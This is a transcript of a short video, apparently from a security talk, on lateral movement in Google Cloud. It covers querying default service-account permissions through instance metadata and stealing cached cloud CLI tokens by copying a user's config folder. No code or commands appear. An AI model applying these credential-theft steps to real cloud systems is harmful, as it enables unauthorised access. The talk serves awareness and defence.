Google Cloud Hack: Uncovering Lateral Movement Secrets #shorts

Here we see that it's not a problem. It's not a vulnerability that we can patch because the problem here is how we as IT persons use our systems. Um before we go into how did I get into GitHub GitLab then uh we're going to ask another question which we sort of skipped over which is even if they had access from the Docker container network wise to the Jenkins interface they still need to have that credentials, right? Um so how they did that is uh longer story uh and it starts in Google Cloud. And we're going to talk about lateral movement in Google Cloud. Um and assume that the threat actor has compromised one machine in Google Cloud.

So one thing which is kind of interesting is that if you just you know, spin up a new VM in uh GCP and you just do next next next next next next next then you're going to get like these default service accounts that's going to run uh because every machine needs to have this service account. And that one actually has quite generous permissions including like reading your uh buckets. So in some cases actually you can like if you're live on the machine you can query this internal uh metadata, right? But anyways, you can query this if if someone has compromised the machine. They can read out what does this uh service account um what's the permissions.

So that's one way which is very interesting that you can find on the compromised uh cloud machine. Another one is those CLI uh utilities that everyone is using. So assume that you have like a fairly locked down network. It's only able to access APIs from this specific server. What's going to happen is that someone is going to remote into that server. Then they want to use like uh Google Cloud the CLI tool or you know, you have like AWS CLI, you have AZ and so on for the different vendors. But what happens is that they log in, they then are on that specific server. They do like a cloud in it or whatever command and they

need to enter and authenticate the token and that's going to be saved in their user profile. So if a threat actor then comes along and compromises that machine, then they can of course use dump whatever is in their user profile. And all of a sudden they are inside that um yeah, that same context that that CLI program is. And on Linux it would be yeah, under your dot config or whatever, right? Um these are all like sometimes they're encrypted, sometimes they're plain text and so on, but what what's sort of a good rule of thumb is that do you need to enter a password every single time you're using this? No. So then they're probably a reversible

encryption. Right? So the easiest way like you can probably dump this in a really fancy cool way, but the easiest way is probably just copy everything that is in that config folder, paste it on your own machine and then all of a sudden it just works. So it's fairly easy to dump this.